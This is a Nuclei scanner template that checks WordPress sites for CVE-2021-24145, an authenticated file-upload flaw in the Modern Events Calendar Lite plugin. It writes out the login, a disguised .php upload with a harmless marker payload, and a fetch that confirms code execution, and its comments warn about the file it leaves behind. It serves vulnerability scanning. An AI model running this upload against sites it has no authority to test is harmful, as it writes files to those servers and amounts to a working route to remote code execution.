nuclei-templates/cves/2021/CVE-2021-24145.yaml


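# Nuclei template: authenticated check for CVE-2021-24145 (CWE-434) in the
# Modern Events Calendar Lite WordPress plugin, versions before 5.16.5.
#
# Flow: log in with operator-supplied {{username}}/{{password}} (the CVSS
# vector is PR:H, i.e. an administrator account), submit a marker file through
# the plugin's import form with a .php filename declared as text/csv, then
# fetch the file from the uploads directory and check that it was executed.
#
# Side effect: request 2 writes {{randstr}}.php into /wp-content/uploads/ and
# nothing in this template deletes it. Remove the file from the target after
# the scan. The `intrusive` tag lets scans that must not modify the target
# exclude this template.
#
# Detection: the upload is a multipart POST to
# /wp-admin/admin.php?page=MEC-ix&tab=MEC-import whose "feed" part has a
# filename ending in .php while its Content-Type is text/csv.
id: CVE-2021-24145

info:
  name: Modern Events Calendar Lite < 5.16.5 - Arbitrary File Upload to RCE
  author: theamanrawat
  severity: high
  description: |
    Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.
  reference:
    - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
    - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
    - https://github.com/dnr6419/CVE-2021-24145
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24145
  remediation: Fixed in version 5.16.5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24145
    cwe-id: CWE-434
  metadata:
    verified: "true"
  tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive

requests:
  - raw:
      # Request 1: WordPress login. The session cookie is carried into the
      # following requests by `cookie-reuse`.
      # The empty line between the headers and the body is required in every
      # raw request below; without it the request is malformed.
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      # Request 2: plugin import form. Each multipart part also needs an empty
      # line between its part headers and its content.
      - |
        POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875

        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
        Content-Type: text/csv

        <?php echo 'CVE-2021-24145'; ?>
        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="mec-ix-action"

        import-start-bookings
        -----------------------------132370916641787807752589698875--

      # Request 3: fetch the uploaded file to see whether the server runs it.
      - |
        GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    # req-condition exposes the per-request variables (body_3, status_code_3,
    # all_headers_3) that the DSL matcher below relies on.
    req-condition: true
    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, 'CVE-2021-24145')
          # The marker string is also present in the raw PHP source, so a
          # server that returns the file without executing it would still
          # satisfy the check above. Require that the PHP open tag is absent,
          # so a match means the code actually ran.
          - "!contains(body_3, '<?php')"
        condition: and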